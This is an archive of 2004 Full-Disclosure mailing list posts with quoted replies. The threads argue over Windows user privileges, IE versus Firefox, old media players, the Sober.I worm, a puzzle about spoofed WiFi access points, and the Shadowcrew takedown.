Dell gives the full OS cd and then a separate drivers CD, at least on the business side. Not sure about the home side. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Mike Hoye Sent: Saturday, November 20, 2004 7:19 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Windows user privileges On Fri, Nov 19, 2004 at 04:19:49PM -0600, Paul Schmehl wrote: Windows has several groups. By default users are in the USERS group, *not* the ADMINISTRATORS group. On every XP install that I've seen from every major OEM (Dell, Compaq, Gateway, etc) fast user switching is on by default and every user is an administrator. Not on most; on every single one. Furthermore, these machines don't have actual XP OS install CDs, they usually come with restore CDs that just return the PC to this same initial state if they're used, which they almost never are. I have never seen a home user, that is to say change that setting or create a user who is actually just a User. Not once, ever. It might make sense if you actually had knowledge of an OS before you criticize it. I don't think the question should be why is IRC still around, I think the question should be why is full-disclosure turning into IRC? - Mike Hoye -- Buy land. They've stopped making it. - Mark Twain ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
Ohh don't worry I am not knocking it. The 6.4 version will play some of those AVI files that the version 9 and 10 won't play because of codec stuff, kinda of funny. =) -Original Message- From: GuidoZ [mailto:[EMAIL PROTECTED] Sent: Saturday, November 20, 2004 1:15 AM To: Todd Towles Cc: [EMAIL PROTECTED] Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox Dude, mplayer2 rulez!! I use it to play all sorts of things. =) I'm glad they left it there... the newer MS media player is just bloat. Media Player Classic (that comes with RealAlternative and QuickTime Alternative) is another one of my favs. =D Yeah, not really anything to do with the topic, but I felt it had to be said. Don't go knocking my v6.4. ;) -- Peace. ~G On Fri, 19 Nov 2004 12:41:25 -0600, Todd Towles [EMAIL PROTECTED] wrote: Microsoft integration: You remove the application that plays MPEG movies from a system that has never needed to play MPEG movies, and never will need to - and your system won't boot anymore. Example - Anyone with XP, do a search for mplayer2.exe? What is this you ask? It is media player 6.4 =) You only think you upgraded to Media player 10..lol -Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
I use WinAmp for Music and the Microsoft stuff for Video...I don't do a lot of video stuff. The lastest Winamp is pretty nice. I can always stream shoutcast or video to my XBOX so..lol -Original Message- From: GuidoZ [mailto:[EMAIL PROTECTED] Sent: Saturday, November 20, 2004 3:03 PM To: Todd Towles Cc: [EMAIL PROTECTED] Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox This is true. It will also play many other types of files (with something like ffdshow) that WMP 9/10 can, although it will do so with about have the memory footprint and start twice as fast. Gotta love upgrades. =/ I moved more to BS Player, as it's pretty quick and comes with all the bells and whistles you'll need. Of course VideoLAN (VLC) is also a nice choice. I prefer the BS Player interface (think PowerDVD Crystal theme). =D -- Peace. ~G On Sat, 20 Nov 2004 14:41:59 -0600, Todd Towles [EMAIL PROTECTED] wrote: Ohh don't worry I am not knocking it. The 6.4 version will play some of those AVI files that the version 9 and 10 won't play because of codec stuff, kinda of funny. =) -Original Message- From: GuidoZ [mailto:[EMAIL PROTECTED] Sent: Saturday, November 20, 2004 1:15 AM To: Todd Towles Cc: [EMAIL PROTECTED] Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox Dude, mplayer2 rulez!! I use it to play all sorts of things. =) I'm glad they left it there... the newer MS media player is just bloat. Media Player Classic (that comes with RealAlternative and QuickTime Alternative) is another one of my favs. =D Yeah, not really anything to do with the topic, but I felt it had to be said. Don't go knocking my v6.4. ;) -- Peace. ~G On Fri, 19 Nov 2004 12:41:25 -0600, Todd Towles [EMAIL PROTECTED] wrote: Microsoft integration: You remove the application that plays MPEG movies from a system that has never needed to play MPEG movies, and never will need to - and your system won't boot anymore. Example - Anyone with XP, do a search for mplayer2.exe? What is this you ask? It is media player 6.4 =) You only think you upgraded to Media player 10..lol -Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
Windows doesn't tell you about the Admin account and makes the default user a Admin. That isn't best method as you know. RunAs is great..but that is only good once you create a normal user - and then delete your new default user. Or you log in in Administrator and take away the full control of the default user. Easy for the average window user? Nope. If it was Microsoft would make the default user (note USER) and then let you configure the Admin account on start. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Crotty, Edward Sent: Friday, November 19, 2004 12:13 PM To: [EMAIL PROTECTED] Subject: RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox I'm not a Win based guy (troll?) - Un*x here - and even I was offended by #1. There is such a thing as runas for Windows. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of devis Sent: Friday, November 19, 2004 11:10 AM Cc: [EMAIL PROTECTED] Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox This message is primarily destined to all MS trolls, no matter their levels, and i can see so many in this list that i am happy to target a large audience. Please run some unix or at least read about the unix permission system, and lets pray god this sheds some light in your mono cultured brains. Here are the relevant points: 1) Despite recent ameliorations of MS ( multi user finally, permissions ... ) and some effort at making the system more secure, something very important is still left out: The first default user of the MS computer is made an administrator. This comes down to giving uid0 to ur first unix user. Unix does NOT do that. It requieres you to use su and become root ( administrator ) after proper credentials submission ( password ). The first user is NOT and administrator, and any recent Unix documentation will insist on the danger of running as root(admin). Unix keeps the admin account well separated from the user account, which MS DOESN'T, despite all wrong arguments i read on this list. VERY BAD practice generally. So its user friendly, as the user has admin rights and can therefore install and remove software and change major configuration. Majority of users don't and will never know there is an 'administrator' user that hides from their eyes. This little detail that apparently Ms people can't 'understand' is a huge step. Please install a proper unix, create 2 accounts and try to read the home directory of the second user from the first. 2) After all, they don;t need to know . You're on a need to know basis job Do MS really think the users are stupid ? Do understanding different IDs/ roles / accounts on a computer that much of a tough message to pass to the end user ? Isn't security important and supposedly the goal of recent MS developpements ? If they really did target security, their efforts will have been into making the user understand that he should be admin to install programs, and a non priviledged user to surf the web. IS that that hard to understand ? And that much hidden into high IT security professionnal unreachable knowledge ? I don;t think so. Doesn't a company such as MS has enough ressources to make that a priority and educate the users ? Off course it has. Just not very 'commercially' friendly as if user then understand roles, it might requires less Anti virus, personnal firewall and other bullshit FUD's scareware ( Yes its scareware, and it is the best selling software category OF ALL times of software history ). This is why, Firefox being independant from this OS that carries 60 of its code base as being legacy code for older system hardware and backward compatibility, is likely more secure than the in house integrated application. Now if u are running Firefox as an administrator .don't be surprised if something happens. Don;t blame the software, but your poor security practices. Lets not hide from ourselves whats needed from MS to reach modern world security: a complete rewrite, and a ditch of old Dos base and the 20 years old legacy code. Hopes that clears things. Rafel Ivgi, The-Insider wrote: Firefox is not intgrated to the OS, because it doesn't have an OS. Its just a trimmed Mozilla for windows.. However Mozilla in Linux is integrated at some level...so they are just the same as I.E. Rafel Ivgi, The-Insider Security Consultant Malicious Code Research Center (MCRC) Finjan Software LTD E-mail: [EMAIL PROTECTED] - Prevention is the best cure! - Original Message - From: john morris [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Sunday, November 14, 2004 3:34 PM Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox Firefox avoids several fundamental design flaws of IE, in that:
RE: [Full-Disclosure] Sober.I worm is here
It arrives at .doc, .txt and .word? Where are you seeing that? It can't be very dangerous as a TEXT file. As far as I know it uses the normal double extensions tricks. Any good email filter should pick this up and you should be fine. Anyone that just clicks on random attachments in their e-mail and doesn't have anti-virus, should get infected. At least, they are letting someone that knows something use your computer for something..lol j/k -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Danny Sent: Friday, November 19, 2004 11:07 AM To: KF_lists Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Sober.I worm is here On Fri, 19 Nov 2004 11:22:31 -0500, KF_lists [EMAIL PROTECTED] wrote: can you define medium sized epidemic? Any new features / functionality? Not too much, except for the fact that it also arrives with the following attachment extenstions: .doc, .txt, and .word Which are not typically blocked by layer 7 aware firewalls. Whereas, the biggies .scr, .pif, .exe, .com, .bat, etc., are usually blocked. ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
Microsoft integration: You remove the application that plays MPEG movies from a system that has never needed to play MPEG movies, and never will need to - and your system won't boot anymore. Example - Anyone with XP, do a search for mplayer2.exe? What is this you ask? It is media player 6.4 =) You only think you upgraded to Media player 10..lol -Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] WiFi question
It shouldn't take a wireless expert to tell you that...he should try it. I pick up all types of weird stuff all the time in Kismet..and it looks like something..but I know it isn't..the SSID is A^B^C^B^D^S^G, or in other words, trash. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Paul Schmehl Sent: Friday, November 19, 2004 10:51 AM To: Lachniet, Mark Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] WiFi question --On Thursday, November 18, 2004 09:32:27 AM -0600 Paul Schmehl [EMAIL PROTECTED] wrote: --On Wednesday, November 17, 2004 12:41:44 PM -0500 Lachniet, Mark [EMAIL PROTECTED] wrote: Could also be RF interference. One of my coworkers tracked down a particularly interesting problem with motion sensor lights. Turns out the motion sensors worked at the 240mhz range, which has resonance at 2.4ghz, or something like that. Hence every time the motion sensor worked, it would spew what the wardriving (site survey) apps thought was a zillion different access points with widely varying MAC addresses. I would have though it was a FAKEAP program also. I would assume the same could happen with other interference. Having a common SSID would seem to indicate this is not the problem, but just thought I'd mention it. Thanks for a particularly interesting and potentially useful bit of information, Mark. After forwarding this to our wireless expert, he responded with this (which he has authorized me to forward to the list.) I find it hard to believe that this is possible. 2.4Ghz is the 9th harmonic. By the time you get to the 4th harmonic of a signal, even in very very noisy radiators, the strength of the harmonic component of the signal is extremely minute. And, given the fact that one of those sensors (which most likely does *not* truly operate in the 240MHz portion of the spectrum) will have a very low output (Part 15 device), the 10th harmonic of that signal will be undetectible as it will be at or below the level of background noise. Finally, if a device managed to get past all of the improbabilities above, the chances of it *accidentally* creating a signal that looked like an 802.11 beacon packet, complete with preamble, header, etc is so off the charts as to be laughable. One other thing... If that device truly was operating at 240MHz, then the first harmonic would be 480MHz. I'm pretty sure that frequency lies in the public service bands (ie fire/police). If not, its very close. Given that and the fact that the first harmonic would be much stronger than the 9th harmonic, I'm pretty sure someone in those bands would have complained loudly to the FCC as they don't take intereference issues in those bands lightly. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: controversial shadowcrew site hacked by secret service?
That is like asking...why docops pick up the phone atthe homeof a drug dealer? What do you think? They are getting the word out that if you were a part of this site..that you have not been forgotten. From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED]Sent: Thursday, November 18, 2004 8:17 AMCc: full-disclosure; [EMAIL PROTECTED]Subject: Re: [Full-Disclosure] Re: controversial shadowcrew site hacked by secret service? [EMAIL PROTECTED] wrote on 11/17/2004 02:55:08 PM: Hello list, Mission Impossible theme sounded weird (too weird) and so on... Tell me: why should these link be active after the "UNITED STATES SECRET SERVICE Operation" ? http://www.shadowcrew.com/phpBB2/login.php http://archive.shadowcrew.com/Archive/ Matteo GiannoneMatteo...you don't suppose maybe law enforcement might leave the site and logins up to perhaps generate a list of who is going there, do you? Nah, that's way too sneaky and underhanded for our government-types, of course. /sarcasm off CONFIDENTIALITY NOTICE: This is a transmission from Kohl's Department Stores, Inc.and may contain information which is confidential and proprietary.If you are not the addressee, any disclosure, copying or distribution or use of the contents of this message is expressly prohibited.If you have received this transmission in error, please destroy it and notify us immediately at 262-703-7000.CAUTION:Internet and e-mail communications are Kohl's property and Kohl's reserves the right to retrieve and read any message created, sent and received. Kohl's reserves the right to monitor messages by authorized Kohl's Associates at any timewithout any further consent.
RE: [Full-Disclosure] For your pleasure
Here is the English version via babelfish and tinyurl. In other words, the employee of Microsoft author of these sound files would have used a pirated version of the software SoundForge. http://tinyurl.com/5849c -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Laurent LEVIER Sent: Wednesday, November 17, 2004 4:26 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] For your pleasure Guys, For your pleasure: http://www.materiel.be/n/7685/Des-fichiers-pirates-dans-XP.php I know, it is in French, but here is my translation, it deserves to be known. Digging into Windows XP Operating Systems, the journalists of PC Welt discovered the following text at the end of the files presents into the C:/Windows/Help/Tours/WindowsMediaPlayer/Audio/Wav directory: [see the picture at the link] You have to know that DeepzOne is the nickname of a founding member of the Radium cracking group created in 1997 and especialized into the craking of sound oriented software. To say it another way, the Microsoft guy who created these files used a cracked version of the SoundForce program. Even if it is probable the Redmond giant has a license of this program (400$), it looks bad to see this when we are hearing everywhere about the Microsoft anti-piracy policy... Laurent LEVIER Systems Networks Security Expert, CISSP CISM ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: controversial shadowcrew site hacked by secret service?
But they do own them..lol Seriously.. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v Sent: Thursday, November 18, 2004 10:03 AM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Re: controversial shadowcrew site hacked by secret service? Ok, so it was the secret service who put a new homepage up, but have the secret service done this before with other sites, or is this the first time? I wish they wouldn't do it in future, its looks too we own you kid behaviour. Thanks,n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment
I sent this to n3td3v yesterday. Why look into the news..just go to the DOJ website...st8r to the fish's mouth. Indictment for hundreds of credit cards, UK passports, state licenses, school IDs, bank accounts...etc.. -Original Message- From: Todd Towles Sent: Tuesday, November 16, 2004 1:59 PM To: 'n3td3v' Subject: RE: [Full-Disclosure] Shadowcrew Grand Jury Indictment http://www.usdoj.gov/usao/nj/publicaffairs/NJ_Press/files/pdff iles/firewallindct1028.pdf -Original Message- From: n3td3v [mailto:[EMAIL PROTECTED] Sent: Tuesday, November 02, 2004 8:27 PM To: Todd Towles Subject: Re: [Full-Disclosure] Should the industry be expecting a hacker response to election results? On Tue, 2 Nov 2004 20:07:28 -0600, Todd Towles [EMAIL PROTECTED] wrote: Your messeage would assume all hackers are for Kerry...that may not be true True, I was really just trying to stir up opinion on the list and it kinda backfired on me. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Mailfilters or how I learned to stop worrying and love the n00bs.
Nicely done Skylined. Hey Jason, If you don't like FD... Might want to get on BugTraq..for your super-clean delayed news. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Berend-Jan Wever Sent: Wednesday, November 17, 2004 8:59 AM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] Mailfilters or how I learned to stop worrying and love the n00bs. Hey, I just heard of a really cool new technology called mail-filters! It works like this: 1) You set up a rule to filter out everything you don't want to read (for instance where the topic contains election fraud). 2) Go make some coffee, smoke a cigarette, code an exploit, whatever you want to do with all the free time you now have! Turns out it's not new AT ALL! Every decent mailclient has been supporting it for years!! Is that cool or what !? You can even set a filter for specific people (for instance where the from line contains Berend-Jan Wever), so you won't have to read anything I ever send to any list again! Cheers, SkyLined - Original Message - From: Esler, Joel - Contractor [EMAIL PROTECTED] To: Jason [EMAIL PROTECTED]; Eric Scher [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Wednesday, November 17, 2004 15:05 Subject: RE: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list. In my opinion, I believe this list should be moderated for about a month or so. Just to weed the bullsh*t off. J -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jason Sent: Tuesday, November 16, 2004 10:20 PM To: Eric Scher Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list. tell him directly Gregh [EMAIL PROTECTED] Eric Scher wrote: [...] No point in sticking around to watch this ship finish sinking. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] WiFi question
If you want to do Kismet, get a Sharp Zaurus handheld and install OpenZaurus. Been running Dsniff, Kismet and Nmap on my handheld. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Dave King Sent: Wednesday, November 17, 2004 10:52 AM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] WiFi question As far as handheld devices to aid you in your quest go, there are several options. If you've got a Pocket PC around you can try ministumbler, which is basically the Pocket PC version of netstumbler. It's free and would probably do most of what you want. If you want more and you're willing to fork out some cash (I believe it's around $3000) AirMagnet can do some really cool stuff but it's probably overkill for you. If you're feeling brave and can get a hold of an Ipaq you can replace Windows with Familiar Linux (www.handhelds.org) and then install Kismet (www.kismetwireless.net) which is a great free WiFi detecting/sniffing utility. Kismet can even work with a gps reciever and triangulate the location of the access point (although gps systems don't tend to work well in buildings). This option is what I use since I could run it on an Ipaq I picked up off Ebay cheap and has all the features I need, plus it's free. Laters, Dave King http://www.thesecure.net [EMAIL PROTECTED] wrote: List, I'm an expert in nothing so when I saw this I had to ask, as Im sure theres someone out there that is a WiFi expert. Google has found no answer so here goes. Last night we saw a new access point appear. No problems its an ad-hoc network so its someone's machine with XP on configured for their home W-LAN probably. Running Netstumbler shows more on it though. You get 2 Access Points showing this ESSID for a few seconds. Then you get a 3rd, then a 4rth. Then the first two drop off, this repeats forever. Always using a different MAC address when a new AP appears. The APs are all WEP enabled (which I cant crack cos I dont have the savvy or the tools :) ) and this goes on forever. The MACs are all from different pools (i.e. assigned to different manufacturers) so the only conclusion is that they are all spoofed MACs. I have walked around the office and as far as I can tell its coming from this office (the IT dept), basing that assumption on signal strength. Anyone seen any tools that do this? I would love a little hand-held gadget that would help me find it (like the scanner in Alien!) Answers on a post card :) Colin. * ** *** This e-mail is confidential and may contain privileged information. If you are not the addressee or if you have received the e-mail in error, it may be unlawful for you to read, copy, distribute, disclose or otherwise use the information which it contains. Under these circumstances, please notify us immediately by returning this mail to '[EMAIL PROTECTED]' and deleting this e-mail from your system. Any views expressed by an individual within this e-mail do not necessarily reflect the views of Cadbury Schweppes Plc or its subsidiaries. Cadbury Schweppes Plc will not be bound by any agreement entered into as a result of this email, unless its intention is clearly evidenced in the body of the email. Whilst we have taken reasonable steps to ensure that this e-mail and attachments are free from viruses, recipients are advised to subject this mail to their own virus checking, in keeping with good computing practice. Please note that email received by Cadbury Schweppes Plc or its subsidiaries may be monitored in accordance with the prevailing law in the United Kingdom. * ** *** ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] WiFi question
I would have to agree with GuidoZ. The changing MAC would point to something being up. AP using different channels is pretty common in some models but the MAC changing and being different vendors points to fake AP. I bet you 10 bucks the WEP key changes on all but one of them each time too..lol -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of GuidoZ Sent: Wednesday, November 17, 2004 12:42 PM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] WiFi question I'm not 100% on this, as it could be something I've never heard of (of course). However, it sounds a lot like someone is playing with FakeAP: - http://www.blackalchemy.to/project/fakeap/ It's not real difficult to setup and only requires a Prisim chipset card (one or more) and a compatible Linux distro. It's been around for over 2 years, but hasn't been touched for about the same amount of time. See the site for more. -- Peace. ~G On Wed, 17 Nov 2004 13:53:07 +, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: List, I'm an expert in nothing so when I saw this I had to ask, as Im sure theres someone out there that is a WiFi expert. Google has found no answer so here goes. Last night we saw a new access point appear. No problems its an ad-hoc network so its someone's machine with XP on configured for their home W-LAN probably. Running Netstumbler shows more on it though. You get 2 Access Points showing this ESSID for a few seconds. Then you get a 3rd, then a 4rth. Then the first two drop off, this repeats forever. Always using a different MAC address when a new AP appears. The APs are all WEP enabled (which I cant crack cos I dont have the savvy or the tools :) ) and this goes on forever. The MACs are all from different pools (i.e. assigned to different manufacturers) so the only conclusion is that they are all spoofed MACs. I have walked around the office and as far as I can tell its coming from this office (the IT dept), basing that assumption on signal strength. Anyone seen any tools that do this? I would love a little hand-held gadget that would help me find it (like the scanner in Alien!) Answers on a post card :) Colin. ** This e-mail is confidential and may contain privileged information. If you are not the addressee or if you have received the e-mail in error, it may be unlawful for you to read, copy, distribute, disclose or otherwise use the information which it contains. Under these circumstances, please notify us immediately by returning this mail to '[EMAIL PROTECTED]' and deleting this e-mail from your system. Any views expressed by an individual within this e-mail do not necessarily reflect the views of Cadbury Schweppes Plc or its subsidiaries. Cadbury Schweppes Plc will not be bound by any agreement entered into as a result of this email, unless its intention is clearly evidenced in the body of the email. Whilst we have taken reasonable steps to ensure that this e-mail and attachments are free from viruses, recipients are advised to subject this mail to their own virus checking, in keeping with good computing practice. Please note that email received by Cadbury Schweppes Plc or its subsidiaries may be monitored in accordance with the prevailing law in the United Kingdom. ** ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
OPENSTEP's Mach/BSD amalgam is the basis for Apple's Mac OS X operating system. Is that BSD in there? Ummm... Apple took over OPENSTEP, no wonder they selected NextStep. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Monday, November 15, 2004 1:42 PM To: [EMAIL PROTECTED] Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox On Sun, Nov 14, 2004 at 11:53:46PM -0600, JxT wrote: The BSD layer is based on the BSD kernel, primarily FreeBSD. That information is available on Apple's Developer Site. OSX is based on the Mach kernel, not the bsd kernel. Apple selected OPENSTEP to be the basis for the successor of the classic Mac OS. It became the Cocoa API of Mac OS X. OPENSTEP is in fact an upgraded version of NeXTSTEP, which used Mach 2.5. As such, OPENSTEP's Mach/BSD amalgam is the basis for Apple's Mac OS X operating system. http://en.wikipedia.org/wiki/Mach_operating_system ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
I agree with you, maybe good coding was the wrong word. But you got the idea. IE isn't part of the OS in Microsoft mind...but it is in the customers. You get a new computer and you hear on the TV, not to use IE...because it has holes. A good customer does the right thing and gets another browser and uses that. Not knowing that Outlook and IE problem can hurt them anyways. Microsoft doesn't show separate to the customer - why? Because they people believe want stuff all connected together, which is true. Most of the customers don't see what is happening and it takes professional like us to get the ball rolling...to protect them and us. Microsoft made a bold step by changing security in SP2. It was going to break stuff...and it was stupid to see people yell about that. They told us it would, we knew it would. I am glad to see they are starting to take steps toward a better systems, but Microsoft has room for improvement to say the least. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of joe Sent: Monday, November 15, 2004 1:26 PM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] IE is just as safe as FireFox Everytime a Firefox exploit comes out..there is already a fix... is that magic? No..it is good coding... What? Having a quick fix out is due to low complexity of issue and assisted by a lack of dependencies so you have reduced time for patching and testing. It has nothing to do with code quality. I have seen some extremely good code that hit an issue that took long periods of time to correct due to the complexity of the issue with all of the requirements that had to be stacked up to cause an issue. I have also seen crappy code that could be pretty quickly patched up for various things and often contributed to how crappy it was. Again, code quality and time to patch has nothing to do with each other except if you had great code you wouldn't even have to worry about exploits and patching. Great code, IMO, requires 100% assertions of all incoming data and NO ONE does that. Programmers assume that incoming data will fit in a specific range and go with it. At some point we as developers (some earlier than others) learned that we should at least be checking for data length though that still isn't the full assertion that should be done on the quality and state of the data. One reason for not doing a full assertion is for future flexibility, don't check the data too close so you don't have to recompile for a new use. Mostly it is done because coders just don't think someone will do something so off the wall or are too lazy or too pressed for time to care. Saying that, I agree, as I have stated many times on this list, that IE needs to be backed down. If there has to be some piece of it that absolutely has to be in the OS it should be a very basic very small very simple hello world basic HTML only rendering capability - you get fonts and anchors and not much more - it isn't even possible to execute anything even if the user agrees with a signature in blood. The code being tiny and truly a part of the OS in that it isn't possible to upgrade it to IE version x. It is updated with OS updates. Code so small and tight and well controlled and understood and practically memorized by the developers that MS could put a monetary guarantee behind the ability to exploit it. Say HTTP-EQUIV gets $10 million if he finds a way to crack it and run remote exploit code with a realistic POC. If someone wants a full function IE, they load that separately an dit runs in a sandbox as guest. Personally I never agreed that IE was truly part of the OS. There are some artificial dependencies built in for some of the display stuff like help, etc but NTFS and threading and all of that works just fine without IE. If pulling IE out of the Explorer shell is too difficult. Then I for one would be fully behind a new secure type shell replacement for the Explorer Shell. We had ProgMan Shell for several years then we got the Explorer Shell. Maybe it is time to get a new shell, at least for servers. I was recently in Redmond and the message I kept feeding back over and over again was that we needed a way to not have to load IE onto machines. I am looking to moving forward ideas. If they give me the ability, I am not going to whine why I can't do the same on Win9x or 2K or even XP. So many people bitch on this list about MS supporting legacy stuff and then they or someone else starts bitching that MS isn't back porting the changes. Pick one or the other but keep in mind if things have to keep getting back ported, resources for that aren't moving us forward. I myself, would rather move forward. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Todd Towles Sent: Friday, November 12, 2004 10:10 AM
RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
Darwin and BSD...Darwin is the open source kernel that OS X uses...=) -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of JxT Sent: Tuesday, November 16, 2004 7:45 AM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox I believe it says The BSD layer is based on the BSD kernel, primarily FreeBSD. It does not says the OSX kernel. peep developer.apple.com if you really don't believe me ;-) it's a tad more reliable then wikipedia -JxT On Mon, 15 Nov 2004 11:41:35 -0800, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Sun, Nov 14, 2004 at 11:53:46PM -0600, JxT wrote: The BSD layer is based on the BSD kernel, primarily FreeBSD. That information is available on Apple's Developer Site. OSX is based on the Mach kernel, not the bsd kernel. Apple selected OPENSTEP to be the basis for the successor of the classic Mac OS. It became the Cocoa API of Mac OS X. OPENSTEP is in fact an upgraded version of NeXTSTEP, which used Mach 2.5. As such, OPENSTEP's Mach/BSD amalgam is the basis for Apple's Mac OS X operating system. http://en.wikipedia.org/wiki/Mach_operating_system ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [in] Re: [Full-Disclosure] IE is just as safe as FireFox
It doesn'tI was responding to another off-topic message. But they again, how many messages on FD same on topic for more than 10 messages. =) Who do you think posted the original IE is just as safe as FireFox message? ;) So what did you message add to the subject? Other than telling me it was OT..which is given. -Original Message- From: Danny [mailto:[EMAIL PROTECTED] Sent: Tuesday, November 16, 2004 10:28 AM To: Todd Towles Cc: [EMAIL PROTECTED] Subject: Re: [in] Re: [Full-Disclosure] IE is just as safe as FireFox On Tue, 16 Nov 2004 09:07:56 -0600, Todd Towles [EMAIL PROTECTED] wrote: Darwin and BSD...Darwin is the open source kernel that OS X uses...=) What does this have to do with IE and Firefox, again? ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
